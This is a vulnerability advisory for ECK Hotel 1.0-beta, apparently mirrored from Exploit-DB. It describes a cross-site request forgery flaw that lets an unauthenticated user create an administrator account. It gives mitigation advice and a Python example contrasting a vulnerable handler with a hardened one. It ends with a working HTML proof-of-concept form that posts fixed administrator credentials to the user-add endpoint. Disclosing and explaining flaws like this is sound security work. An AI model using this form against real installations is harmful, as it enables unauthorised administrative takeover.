Vendor: ECK Hotel
By: Mustafa Emre Gül
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: ECK Hotel
Affected Version From: 1.0-beta
Affected Version To: 1.0-beta
Patch Exists: NO
Related CWE: N/A
CPE: eck-hotel-v1.0-beta.zip
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Win10 x64
Year: 2020

ECK Hotel 1.0 – Cross-Site Request Forgery (Add Admin)

An unauthenticated user can create an admin user by sending a POST request to the index.php?module=user/user-add page with the necessary parameters. This allows an attacker to gain administrative privileges on the ECK Hotel 1.0-beta application.

Mitigation:

Requiring authentication for the user-add action and validating incoming requests to that endpoint would mitigate this vulnerability.
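To make the mitigation concrete, the following added example (not code from ECK Hotel or the advisory author) models the user-add action twice: once as the advisory describes it, where any POST carrying the PoC's fields creates a user, and once hardened with the checks a CSRF-resistant admin endpoint needs. The app origin, the session model and the csrf_token field name are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

APP_ORIGIN = "http://localhost"  # assumed origin of the ECK Hotel install
ADMIN_ROLE = "1"                  # id_user_role value the PoC form submits

@dataclass
class Session:
    user_role: Optional[str] = None
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))

@dataclass
class Request:
    method: str
    form: dict
    headers: dict
    session: Optional[Session] = None  # None means no session cookie was sent

# Field set taken from the PoC form above (values are the PoC's own).
POC_FIELDS = {"nama": "meg", "id_user_role": ADMIN_ROLE, "jabatan": "meg",
              "nomor_telp": "1", "username": "meg", "password": "meg",
              "user-add": ""}

def user_add_vulnerable(req: Request, users: list) -> int:
    """Behaviour the advisory describes: any POST with user-add creates a user."""
    if req.method == "POST" and "user-add" in req.form:
        users.append({"username": req.form["username"],
                      "role": req.form["id_user_role"]})
        return 302
    return 405

def user_add_hardened(req: Request, users: list) -> int:
    """Same action with authentication, origin and CSRF-token checks."""
    if req.method != "POST" or "user-add" not in req.form:
        return 405
    # 1. Only an authenticated admin session may reach this action at all.
    if req.session is None or req.session.user_role != ADMIN_ROLE:
        return 401
    # 2. A form posted from a third-party page carries that page as Origin/Referer.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != APP_ORIGIN and not origin.startswith(APP_ORIGIN + "/"):
        return 403
    # 3. A per-session secret in the form that an attacker's page cannot supply.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, req.session.csrf_token):
        return 403
    users.append({"username": req.form["username"],
                  "role": req.form["id_user_role"]})
    return 302
```

The assumed origin check uses a prefix match on the scheme and host so that a look-alike host such as a subdomain of another site does not pass.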

Exploit-DB raw data:

# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
# Product : ECK Hotel
# Version : 1.0-beta
# Date: 2020-03-26
# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download
# Exploit Author: Mustafa Emre Gül
# Website: https://emregul.com.tr/
# Tested On : Win10 x64
# Description : Simple Hotel Management System.


PoC:
<!-- Unauthenticated Create Admin User -->
<html>
  <body>
    <form action="http://localhost/index.php?module=user/user-add" method="POST">
      <input type="hidden" name="nama" value="meg" />
      <input type="hidden" name="id_user_role" value="1" />
      <input type="hidden" name="jabatan" value="meg" />
      <input type="hidden" name="nomor_telp" value="1" />
      <input type="hidden" name="username" value="meg" />
      <input type="hidden" name="password" value="meg" />
      <input type="hidden" name="user-add" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>